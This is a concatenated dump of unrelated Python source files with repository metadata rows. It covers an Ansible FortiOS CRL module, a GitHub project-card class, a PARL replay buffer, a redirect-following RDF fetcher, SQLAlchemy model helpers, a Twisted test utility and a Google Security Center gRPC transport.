    resulting dict contains only explicitly supplied module options.
    """
    option_list = ['crl', 'http_url', 'last_updated',
                   'ldap_password', 'ldap_server', 'ldap_username',
                   'name', 'range', 'scep_cert',
                   'scep_url', 'source', 'source_ip',
                   'update_interval', 'update_vdom']
    return {option: json[option]
            for option in option_list
            if option in json and json[option] is not None}
def underscore_to_hyphen(data):
    """Recursively replace '_' with '-' in every dict key of *data*.

    Lists are rewritten in place (their elements converted recursively);
    dicts are rebuilt with hyphenated keys; any other value is returned
    untouched. Returns the (possibly new) object.
    """
    if isinstance(data, list):
        for index, element in enumerate(data):
            data[index] = underscore_to_hyphen(element)
    elif isinstance(data, dict):
        data = {key.replace('_', '-'): underscore_to_hyphen(value)
                for key, value in data.items()}
    return data
def vpn_certificate_crl(data, fos):
    """Create/update ('present') or delete ('absent') a CRL object via *fos*.

    The task body is filtered to known options and its keys hyphenated
    before being sent to the FortiOS API handler.
    """
    vdom = data['vdom']
    state = data['state']
    payload = underscore_to_hyphen(
        filter_vpn_certificate_crl_data(data['vpn_certificate_crl']))
    if state == "present":
        return fos.set('vpn.certificate',
                       'crl',
                       data=payload,
                       vdom=vdom)
    if state == "absent":
        return fos.delete('vpn.certificate',
                          'crl',
                          mkey=payload['name'],
                          vdom=vdom)
    # Neither state matched: abort the module run.
    fos._module.fail_json(msg='state must be present or absent!')
def is_successful_status(status):
    """Return True when the API reply indicates success.

    A DELETE answered with 404 also counts as success (the object was
    already gone).
    """
    if status['status'] == "success":
        return True
    return status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_vpn_certificate(data, fos):
    """Dispatch the vpn_certificate_crl task and summarize the outcome.

    Returns a 3-tuple ``(is_error, has_changed, raw_response)`` consumed
    by ``main``.
    """
    if data['vpn_certificate_crl']:
        resp = vpn_certificate_crl(data, fos)
    else:
        fos._module.fail_json(msg='missing task body: %s' % ('vpn_certificate_crl'))
    # 'revision_changed' is only present on some responses; default to True.
    revision_changed = resp['revision_changed'] if 'revision_changed' in resp else True
    return (not is_successful_status(resp),
            resp['status'] == "success" and revision_changed,
            resp)
def main():
    """Entry point: declare the Ansible argument spec, open the FortiOS
    connection over the httpapi socket, run the CRL task and report."""
    # Master-key attribute used by FortiOSHandler to address objects.
    mkeyname = 'name'
    # Ansible argument spec mirroring the DOCUMENTATION block above.
    fields = {
        "access_token": {"required": False, "type": "str", "no_log": True},
        "vdom": {"required": False, "type": "str", "default": "root"},
        "state": {"required": True, "type": "str",
                  "choices": ["present", "absent"]},
        "vpn_certificate_crl": {
            "required": False, "type": "dict", "default": None,
            "options": {
                "crl": {"required": False, "type": "str"},
                "http_url": {"required": False, "type": "str"},
                "last_updated": {"required": False, "type": "int"},
                "ldap_password": {"required": False, "type": "str"},
                "ldap_server": {"required": False, "type": "str"},
                "ldap_username": {"required": False, "type": "str"},
                "name": {"required": True, "type": "str"},
                "range": {"required": False, "type": "str",
                          "choices": ["global",
                                      "vdom"]},
                "scep_cert": {"required": False, "type": "str"},
                "scep_url": {"required": False, "type": "str"},
                "source": {"required": False, "type": "str",
                           "choices": ["factory",
                                       "user",
                                       "bundle"]},
                "source_ip": {"required": False, "type": "str"},
                "update_interval": {"required": False, "type": "int"},
                "update_vdom": {"required": False, "type": "str"}
            }
        }
    }
    # Warn users still invoking this through the deprecated fortiosapi path.
    check_legacy_fortiosapi()
    module = AnsibleModule(argument_spec=fields,
                           supports_check_mode=False)
    versions_check_result = None
    # A socket path is only present when run over the httpapi connection
    # plugin; without it the module cannot reach the device.
    if module._socket_path:
        connection = Connection(module._socket_path)
        if 'access_token' in module.params:
            connection.set_option('access_token', module.params['access_token'])
        fos = FortiOSHandler(connection, module, mkeyname)
        is_error, has_changed, result = fortios_vpn_certificate(module.params, fos)
        versions_check_result = connection.get_system_version()
    else:
        module.fail_json(**FAIL_SOCKET_MSG)
    # Surface (non-fatally) any FortiOS/galaxy schema version mismatch.
    if versions_check_result and versions_check_result['matched'] is False:
        module.warn("Ansible has detected version mismatch between FortOS system and galaxy, see more details by specifying option -vvv")
    if not is_error:
        if versions_check_result and versions_check_result['matched'] is False:
            module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result)
        else:
            module.exit_json(changed=has_changed, meta=result)
    else:
        if versions_check_result and versions_check_result['matched'] is False:
            module.fail_json(msg="Error in repo", version_check_warning=versions_check_result, meta=result)
        else:
            module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| [
"prashant@cloudstake.com"
] | prashant@cloudstake.com |
218de8abbc9bfd77742d7ab9ac813686655e4ae3 | 46d2a73deb63f81554c478822459a41f09d8519c | /github/objects/projectcard.py | 4b94450c49a4edf517c719c3e31c973f8a74e7dd | [
"Apache-2.0"
] | permissive | ByteMeDirk/github.py | ad036aef661adc4d9a06239f52b79acd5230c430 | 14b14f857fb85c35b5d14ba073afc36e339199b9 | refs/heads/master | 2023-08-10T17:40:52.783117 | 2020-08-13T23:54:55 | 2020-08-13T23:54:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,230 | py | """
/github/objects/projectcard.py
Copyright (c) 2019-2020 ShineyDev
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from github import utils
from github.abc import Node
from github.abc import Type
from github.abc import UniformResourceLocatable
from github.enums import ProjectCardState
class ProjectCard(Node, Type, UniformResourceLocatable):
    """
    Represents a card in a GitHub project.

    Implements:

    * :class:`~github.abc.Node`
    * :class:`~github.abc.Type`
    * :class:`~github.abc.UniformResourceLocatable`
    """

    # https://docs.github.com/en/graphql/reference/objects#projectcard

    __slots__ = ("data", "http")

    def __init__(self, data, http):
        self.data = data
        self.http = http

    @property
    def body(self):
        """
        The note text of the card, if any.

        :type: Optional[:class:`str`]
        """

        return self.data["note"]

    @property
    def created_at(self):
        """
        When the card was created.

        :type: :class:`~datetime.datetime`
        """

        return utils.iso_to_datetime(self.data["createdAt"])

    @property
    def database_id(self):
        """
        The card's primary key in GitHub's database.

        :type: :class:`int`
        """

        return self.data["databaseId"]

    @property
    def is_archived(self):
        """
        Whether the card has been archived.

        :type: :class:`bool`
        """

        return self.data["isArchived"]

    @property
    def state(self):
        """
        The card's state.

        :type: :class:`~github.enums.ProjectCardState`
        """

        return ProjectCardState.try_value(self.data["state"])

    @property
    def updated_at(self):
        """
        When the card was last updated.

        :type: :class:`~datetime.datetime`
        """

        return utils.iso_to_datetime(self.data["updatedAt"])

    async def move_to(self, column, *, after=None):
        """
        |coro|

        Moves the card into *column*, optionally below another card.

        Parameters
        ----------
        column: :class:`~github.ProjectColumn`
            The column to move the card to.
        after: :class:`~github.ProjectCard`
            The card to place the card after. Pass ``None`` to place it
            at the top. Defaults to ``None``.

        Raises
        ------
        ~github.errors.Forbidden
            You do not have permission to move the card.
        """

        # https://docs.github.com/en/graphql/reference/mutations#moveprojectcard

        after_id = None if after is None else after.id
        await self.http.mutate_projectcard_move_to(self.id, column.id, after_id)
| [
"contact@shiney.dev"
] | contact@shiney.dev |
43876ba54601bc0d0ee260b3f6b6a8ad88551d0d | 730430ba3b45d5728ef044863598199bfa33aaaa | /examples/Baselines/Halite_competition/torch/rl_trainer/replay_memory.py | b4c790801b49cecbdfda042bfbf8dbcc81e1227a | [
"Apache-2.0"
] | permissive | PaddlePaddle/PARL | 062d1b4a5335553be6cdfc33ad12f07ebbcd7310 | 3bb5fe36d245f4d69bae0710dc1dc9d1a172f64d | refs/heads/develop | 2023-08-09T02:12:39.741551 | 2023-05-19T17:52:25 | 2023-05-19T17:52:25 | 131,044,128 | 3,818 | 988 | Apache-2.0 | 2023-07-28T03:59:20 | 2018-04-25T17:54:22 | Python | UTF-8 | Python | false | false | 3,684 | py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
class ReplayMemory(object):
    """ Replay Memory for saving data.
    Stores parallel, fixed-size numpy buffers (obs, action, value,
    returns, log_prob, adv) and overwrites the oldest entries once full.
    Args:
        max_size (int): size of replay memory
        obs_dim (int): dimension of the observation
    """
    def __init__(self, max_size, obs_dim):
        self.max_size = int(max_size)
        self.obs_dim = obs_dim
        self.reset()
    def sample_batch(self, batch_size):
        """Sample ``batch_size`` random transitions (with replacement).
        If fewer than ``batch_size`` entries are stored, every stored
        entry is returned once instead.
        """
        if batch_size > self._curr_size:
            batch_idx = np.arange(self._curr_size)
        else:
            batch_idx = np.random.randint(self._curr_size, size=batch_size)
        obs = self.obs[batch_idx]
        action = self.action[batch_idx]
        value = self.value[batch_idx]
        # NOTE(review): only this method reshapes returns to a column
        # vector; sample_batch_by_index leaves it 1-D — confirm callers
        # rely on this asymmetry before unifying.
        returns = self.returns[batch_idx].reshape((-1, 1))
        log_prob = self.log_prob[batch_idx]
        adv = self.adv[batch_idx]
        return obs, action, value, returns, log_prob, adv
    def make_index(self, batch_size):
        """Return ``batch_size`` random indices into the stored data."""
        batch_idx = np.random.randint(self._curr_size, size=batch_size)
        return batch_idx
    def sample_batch_by_index(self, batch_idx):
        """Gather the transitions at the given indices (returns stays 1-D)."""
        obs = self.obs[batch_idx]
        action = self.action[batch_idx]
        value = self.value[batch_idx]
        returns = self.returns[batch_idx]
        log_prob = self.log_prob[batch_idx]
        adv = self.adv[batch_idx]
        return obs, action, value, returns, log_prob, adv
    def append(self, obs, act, value, returns, log_prob, adv):
        """Append a batch of transitions, evicting the oldest on overflow.
        When the new batch would run past the end of the buffers, all
        buffers are rolled left so the write fits contiguously; the roll
        amount equals the overflow, discarding the oldest entries.
        """
        size = len(obs)
        self._curr_size = min(self._curr_size + size, self.max_size)
        if self._curr_pos + size >= self.max_size:
            # Negative shift: rotate existing data toward index 0.
            delta_size = -(size + self._curr_pos - self.max_size)
            self.obs = np.roll(self.obs, delta_size, 0)
            self.action = np.roll(self.action, delta_size)
            self.value = np.roll(self.value, delta_size)
            self.returns = np.roll(self.returns, delta_size)
            self.log_prob = np.roll(self.log_prob, delta_size)
            self.adv = np.roll(self.adv, delta_size)
            self._curr_pos += delta_size
        self.obs[self._curr_pos:self._curr_pos + size] = obs
        self.action[self._curr_pos:self._curr_pos + size] = act
        self.value[self._curr_pos:self._curr_pos + size] = value
        self.returns[self._curr_pos:self._curr_pos + size] = returns
        self.log_prob[self._curr_pos:self._curr_pos + size] = log_prob
        self.adv[self._curr_pos:self._curr_pos + size] = adv
        self._curr_pos = (self._curr_pos + size) % self.max_size
    def size(self):
        """Number of transitions currently stored."""
        return self._curr_size
    def __len__(self):
        return self._curr_size
    def reset(self):
        """Zero all buffers and reset the write cursor."""
        self.obs = np.zeros((self.max_size, self.obs_dim), dtype='float32')
        self.action = np.zeros((self.max_size, ), dtype='int32')
        self.value = np.zeros((self.max_size, ), dtype='float32')
        self.returns = np.zeros((self.max_size, ), dtype='float32')
        self.log_prob = np.zeros((self.max_size, ), dtype='float32')
        self.adv = np.zeros((self.max_size, ), dtype='float32')
        self._curr_size = 0
        self._curr_pos = 0
| [
"noreply@github.com"
] | PaddlePaddle.noreply@github.com |
9825285fd8b02cec04445d56367f20d53ae3c2d7 | 85ac9f05432a2a4299cb43969395fd7865e78267 | /entrega4/src/pruebas/process_redirections_to_turtle.py | 7e480559ab44f750fdf039792dc86192344abdfd | [] | no_license | pablodanielrey/twss | 72d8056c2f3fd2a70d465d3176802dbc019fd022 | b533fa6e0ea86460d8ccb49ec554a6f6e7ab4352 | refs/heads/master | 2023-05-20T03:06:23.078921 | 2021-06-12T23:31:13 | 2021-06-12T23:31:13 | 352,428,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | import sys
import json
import requests
import re
def get_content(req, max_redirects=10):
    """Return the text/turtle body for *req*, following redirects manually.

    3xx responses are chased through their ``Location`` header, re-requesting
    with an ``Accept: text/turtle`` header each hop; a 200 yields the body
    and any other status yields None.

    Args:
        req: a ``requests`` response obtained with ``allow_redirects=False``.
        max_redirects: safety cap on redirect hops so a redirect cycle can
            no longer recurse forever (new parameter; default keeps existing
            callers unchanged).

    Returns:
        The response text, or None when no 200 response is reached.
    """
    if 300 <= req.status_code < 400:
        # It is a redirection: follow Location ourselves so every hop
        # carries the text/turtle Accept header.
        if max_redirects <= 0:
            return None  # give up on cycles / over-long chains
        url = req.headers['Location']
        assert url is not None
        req = requests.get(url, headers={'Accept': 'text/turtle'},
                           allow_redirects=False)
        return get_content(req, max_redirects - 1)
    if req.status_code == 200:
        return req.text
    return None
"""
esto por lo que veo no es necesario
if content and req.status_code != 200:
''' analizo el contenido alternativo '''
alternates = r.headers.get('Alternates',None)
if not alternates:
print(f'No existe representación text/turtle para la url {url}')
return None
url = process_alternates(alternates)
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=False)
return url
"""
def process_alternates(alternates):
    """Pick the URL of the text/turtle variant from an ``Alternates`` header.

    The header is a comma-separated list of ``{"url" ... {type media}}``
    entries; the first whose media type mentions 'turtle' wins, otherwise
    None is returned.
    """
    variant_re = re.compile('{\"(.*)\".*?{type (.*?)}}')
    for entry in alternates.split(','):
        match = variant_re.match(entry.strip())
        if match is None:
            continue
        url, media_type = match.group(1), match.group(2)
        if 'turtle' in media_type:
            return url
    return None
if __name__ == '__main__':
url = sys.argv[1]
r = requests.get(url, headers={'Accept':'text/turtle'}, allow_redirects=True)
print(get_content(r))
| [
"pablodanielrey@gmail.com"
] | pablodanielrey@gmail.com |
009bd21a3d2025431d689ed24c60ffaf15d6dd35 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_threesomes.py | 7e62196108961159ab33296a6027c68b9f050abc | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
# class header
class _THREESOMES():
def __init__(self,):
self.name = "THREESOMES"
self.definitions = threesome
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['threesome']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
bf2f71d4544d180707bbd68d82738833911d9391 | a41742023c5725a3e5cfbf50a54601dbe0416855 | /evafm/database/models.py | 41fcb478214df0029c4445d44854f7a1e9d9ee17 | [] | no_license | UfSoft/EvAFM | 1cccb6651833565ccc2e3d241a2e70040e999291 | 72dca1c40ca6ae90d4228ac0e208c623ed6c5d3b | refs/heads/master | 2020-04-15T04:42:43.690612 | 2011-01-21T23:15:51 | 2011-01-21T23:15:51 | 26,618,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,880 | py | # -*- coding: utf-8 -*-
"""
evafm.core.database.models
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: © 2011 UfSoft.org - Pedro Algarvio (pedro@algarvio.me)
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import logging
from os import path
from operator import itemgetter
from datetime import datetime
from types import ModuleType
from uuid import uuid4
import sqlalchemy
from sqlalchemy import and_, or_
from sqlalchemy import orm
from sqlalchemy.orm.exc import UnmappedClassError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.engine.url import make_url, URL
from werkzeug.security import generate_password_hash, check_password_hash
from evafm.database.signals import database_setup
log = logging.getLogger(__name__)
#: create a new module for all the database related functions and objects
sys.modules['evafm.database.db'] = db = ModuleType('db')
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
class _DebugQueryTuple(tuple):
statement = property(itemgetter(0))
parameters = property(itemgetter(1))
start_time = property(itemgetter(2))
end_time = property(itemgetter(3))
context = property(itemgetter(4))
@property
def duration(self):
return self.end_time - self.start_time
def __repr__(self):
return '<query statement="%s" parameters=%r duration=%.03f>' % (
self.statement,
self.parameters,
self.duration
)
class _ModelTableNameDescriptor(object):
_camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
def _join(match):
word = match.group()
if len(word) > 1:
return ('_%s_%s' % (word[:-1], word[-1])).lower()
return '_' + word.lower()
tablename = self._camelcase_re.sub(_join, type.__name__).lstrip('_')
setattr(type, '__tablename__', tablename)
return tablename
class Model(object):
    """Baseclass for custom user models."""
    #: the query class used. The :attr:`query` attribute is an instance
    #: of this class. By default a :class:`BaseQuery` is used.
    query_class = orm.Query
    #: an instance of :attr:`query_class`. Can be used to query the
    #: database for instances of this model.
    query = None
    # #: arguments for the mapper
    # __mapper_cls__ = _SignalTrackingMapper
    #: derives a snake_case table name from the class name on first access
    #: (see _ModelTableNameDescriptor); subclasses may set one explicitly.
    __tablename__ = _ModelTableNameDescriptor()
#def get_engine():
# return
#
#def _create_scoped_session(db):
# return orm.scoped_session(partial(_SignallingSession, db))
#
class _QueryProperty(object):
    """Descriptor that exposes ``Model.query`` bound to the live session.

    It waits for the ``database_setup`` signal to learn which database
    object to pull sessions from.
    """
    def __init__(self):
        database_setup.connect(self.__on_database_setup)

    def __on_database_setup(self, sender):
        # The sender is the configured database facade.
        self.db = sender

    def __get__(self, obj, type):
        try:
            mapper = orm.class_mapper(type)
        except UnmappedClassError:
            return None
        if not mapper:
            return None
        return type.query_class(mapper, session=self.db.get_session())
# Re-export SQLAlchemy's boolean operators on the synthetic ``db`` module.
db.and_ = and_
db.or_ = or_
#del and_, or_
# Turn the plain ``Model`` baseclass into the declarative base and give
# every mapped subclass a ``query`` property bound to the active session.
Model = declarative_base(cls=Model, name='Model')
Model.query = _QueryProperty()
metadata = Model.metadata
db.metadata = metadata
class SchemaVersion(Model):
    """SQLAlchemy-Migrate schema version control table.

    One row per migrate repository, recording which schema revision the
    database is currently at.
    """
    __tablename__ = 'migrate_version'
    repository_id = db.Column(db.String(255), primary_key=True)  # repository identifier
    repository_path = db.Column(db.Text)  # filesystem path of the repository
    version = db.Column(db.Integer)  # currently applied revision number
    def __init__(self, repository_id, repository_path, version):
        self.repository_id = repository_id
        self.repository_path = repository_path
        self.version = version
| [
"ufs@ufsoft.org"
] | ufs@ufsoft.org |
e6099d9bca20c1e703ed995f7d4e83cb35feb56d | 13d222bc3332378d433835914da26ed16b583c8b | /src/pemjh/challenge111/main.py | 55ded9f15d33ecae72908afa7c8d34a24369a64e | [] | no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | """ Challenge111 """
# pylint: disable=missing-docstring
from pemjh.numbers import is_prime
def build_nums(repeated, other):
    """Yield every interleaving of the digit lists *repeated* and *other*.

    Both arguments keep their internal order; each yielded value is a
    list of digit strings. Repeated-first interleavings come before
    other-first ones, matching the original recursion order.
    """
    remaining = len(repeated) + len(other)
    if repeated:
        if remaining > 1:
            for tail in build_nums(repeated[1:], other):
                yield [repeated[0]] + tail
        else:
            yield [repeated[0]]
    if other:
        if remaining > 1:
            for tail in build_nums(repeated, other[1:]):
                yield [other[0]] + tail
        else:
            yield [other[0]]
def main():
    """ challenge111: for each digit d, sum all 10-digit primes containing
    the maximal number M[d] of repeated d's; return the total of those sums. """
    # pylint: disable=invalid-name
    # M[d] = maximal count of digit d possible in a 10-digit prime.
    M = [8, 9, 8, 9, 9, 9, 9, 9, 8, 9]
    S = []
    for i in range(10):
        s = 0
        # use M[i] to build up all possible numbers
        # m enumerates every zero-padded filler of the 10 - M[i] free
        # positions, as a list of digit characters.
        for m in [list(("%0" + str(10 - M[i]) + "d") % m)
                  for m in range(0, 10**(10 - M[i]))]:
            # Filler digits must not duplicate the repeated digit i,
            # otherwise the repeat count would exceed M[i].
            if not any(int(c) == i for c in m):
                # Interleave the M[i] copies of digit i with the filler.
                for num in [int("".join(b))
                            for b in build_nums([str(i)] * M[i], m)]:
                    # Keep only true 10-digit numbers (no leading zero).
                    if num >= 10**(9) and is_prime(num):
                        # Check each for primality
                        s += num
        S.append(s)
    return sum(S)
| [
"matthew.hussey@googlemail.com"
] | matthew.hussey@googlemail.com |
deaf64a7afcb6d1a9c81b881eef0fa76f4e156d2 | 1f4239936f18b709e82a965022d5d549238bb620 | /klein/test/util.py | 9755e2b9e215d85c5b5aa3c33130e6e879e8b915 | [
"MIT"
] | permissive | WnP/klein | 2165625dcbacb77bc2789dad6c4379685d634d0b | a07a6742abbd2418f2b42bf951ab11de23885c0f | refs/heads/master | 2020-12-25T21:12:27.192758 | 2014-05-14T22:27:06 | 2014-05-14T22:27:06 | 19,759,744 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,926 | py | import twisted
from twisted.trial.unittest import TestCase
from twisted.python import failure
from twisted.python.versions import Version
# On Twisted older than 13.1.0, trial's TestCase lacks successResultOf /
# failureResultOf; shadow the imported TestCase with a subclass that
# backports them so the rest of the test suite can rely on both helpers.
if twisted.version < Version('twisted', 13, 1, 0):
    class TestCase(TestCase):
        def successResultOf(self, deferred):
            """Return the success result already present on *deferred*,
            failing the test if it has no result or a failure result."""
            result = []
            deferred.addBoth(result.append)
            if not result:
                self.fail(
                    "Success result expected on %r, found no result instead" % (
                        deferred,))
            elif isinstance(result[0], failure.Failure):
                self.fail(
                    "Success result expected on %r, "
                    "found failure result instead:\n%s" % (
                        deferred, result[0].getTraceback()))
            else:
                return result[0]
        def failureResultOf(self, deferred, *expectedExceptionTypes):
            """Return the Failure already present on *deferred*, failing the
            test if there is no result, a success result, or a failure of an
            unexpected exception type."""
            result = []
            deferred.addBoth(result.append)
            if not result:
                self.fail(
                    "Failure result expected on %r, found no result instead" % (
                        deferred,))
            elif not isinstance(result[0], failure.Failure):
                self.fail(
                    "Failure result expected on %r, "
                    "found success result (%r) instead" % (deferred, result[0]))
            elif (expectedExceptionTypes and
                  not result[0].check(*expectedExceptionTypes)):
                expectedString = " or ".join([
                    '.'.join((t.__module__, t.__name__)) for t in
                    expectedExceptionTypes])
                self.fail(
                    "Failure of type (%s) expected on %r, "
                    "found type %r instead: %s" % (
                        expectedString, deferred, result[0].type,
                        result[0].getTraceback()))
            else:
                return result[0]
| [
"haggardii@gmail.com"
] | haggardii@gmail.com |
b5199780ed75b7319552b04200ef132351c6e4be | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/cloud/securitycenter/v1p1beta1/securitycenter-v1p1beta1-py/google/cloud/securitycenter_v1p1beta1/services/security_center/transports/grpc_asyncio.py | d39b77cab1dcfc5bbc94c50ed491e85f795a3798 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40,798 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.securitycenter_v1p1beta1.types import finding
from google.cloud.securitycenter_v1p1beta1.types import finding as gcs_finding
from google.cloud.securitycenter_v1p1beta1.types import notification_config
from google.cloud.securitycenter_v1p1beta1.types import notification_config as gcs_notification_config
from google.cloud.securitycenter_v1p1beta1.types import organization_settings
from google.cloud.securitycenter_v1p1beta1.types import organization_settings as gcs_organization_settings
from google.cloud.securitycenter_v1p1beta1.types import security_marks as gcs_security_marks
from google.cloud.securitycenter_v1p1beta1.types import securitycenter_service
from google.cloud.securitycenter_v1p1beta1.types import source
from google.cloud.securitycenter_v1p1beta1.types import source as gcs_source
from google.iam.v1 import iam_policy_pb2 as iam_policy # type: ignore
from google.iam.v1 import policy_pb2 as giv_policy # type: ignore
from google.longrunning import operations_pb2 as operations # type: ignore
from google.protobuf import empty_pb2 as empty # type: ignore
from .base import SecurityCenterTransport, DEFAULT_CLIENT_INFO
from .grpc import SecurityCenterGrpcTransport
class SecurityCenterGrpcAsyncIOTransport(SecurityCenterTransport):
    """gRPC AsyncIO backend transport for SecurityCenter.
    V1p1Beta1 APIs for Security Center service.
    This class defines the same methods as the primary client, so the
    primary client can load the underlying transport implementation
    and call it.
    It sends protocol buffers over the wire using gRPC (which is built on
    top of HTTP/2); the ``grpcio`` package must be installed.
    """
    # Class-level declarations; ``__init__`` rebinds ``_stubs`` per instance,
    # so the class-level dict is never shared between transports in practice.
    _grpc_channel: aio.Channel
    _stubs: Dict[str, Callable] = {}
    @classmethod
    def create_channel(cls,
                       host: str = 'securitycenter.googleapis.com',
                       credentials: credentials.Credentials = None,
                       credentials_file: Optional[str] = None,
                       scopes: Optional[Sequence[str]] = None,
                       quota_project_id: Optional[str] = None,
                       **kwargs) -> aio.Channel:
        """Create and return a gRPC AsyncIO channel object.
        Args:
            host (Optional[str]): The host for the channel to use.
            credentials (Optional[~.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If
                none are specified, the client will attempt to ascertain
                the credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            kwargs (Optional[dict]): Keyword arguments, which are passed to the
                channel creation.
        Returns:
            aio.Channel: A gRPC AsyncIO channel object.
        """
        # Fall back to the transport's default OAuth scopes when the caller
        # does not supply any.
        scopes = scopes or cls.AUTH_SCOPES
        return grpc_helpers_async.create_channel(
            host,
            credentials=credentials,
            credentials_file=credentials_file,
            scopes=scopes,
            quota_project_id=quota_project_id,
            **kwargs
        )
    def __init__(self, *,
            host: str = 'securitycenter.googleapis.com',
            credentials: credentials.Credentials = None,
            credentials_file: Optional[str] = None,
            scopes: Optional[Sequence[str]] = None,
            channel: aio.Channel = None,
            api_mtls_endpoint: str = None,
            client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
            ssl_channel_credentials: grpc.ChannelCredentials = None,
            client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
            quota_project_id=None,
            client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
            ) -> None:
        """Instantiate the transport.
        Args:
            host (Optional[str]): The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is ignored if ``channel`` is provided.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            channel (Optional[aio.Channel]): A ``Channel`` instance through
                which to make calls.
            api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
                If provided, it overrides the ``host`` argument and tries to create
                a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or applicatin default SSL credentials.
            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
                Deprecated. A callback to provide client SSL certificate bytes and
                private key bytes, both in PEM format. It is ignored if
                ``api_mtls_endpoint`` is None.
            ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
                for grpc channel. It is ignored if ``channel`` is provided.
            client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
                A callback to provide client certificate bytes and private key bytes,
                both in PEM format. It is used to configure mutual TLS channel. It is
                ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
        Raises:
            google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
                creation failed for any reason.
            google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
                and ``credentials_file`` are passed.
        """
        self._grpc_channel = None
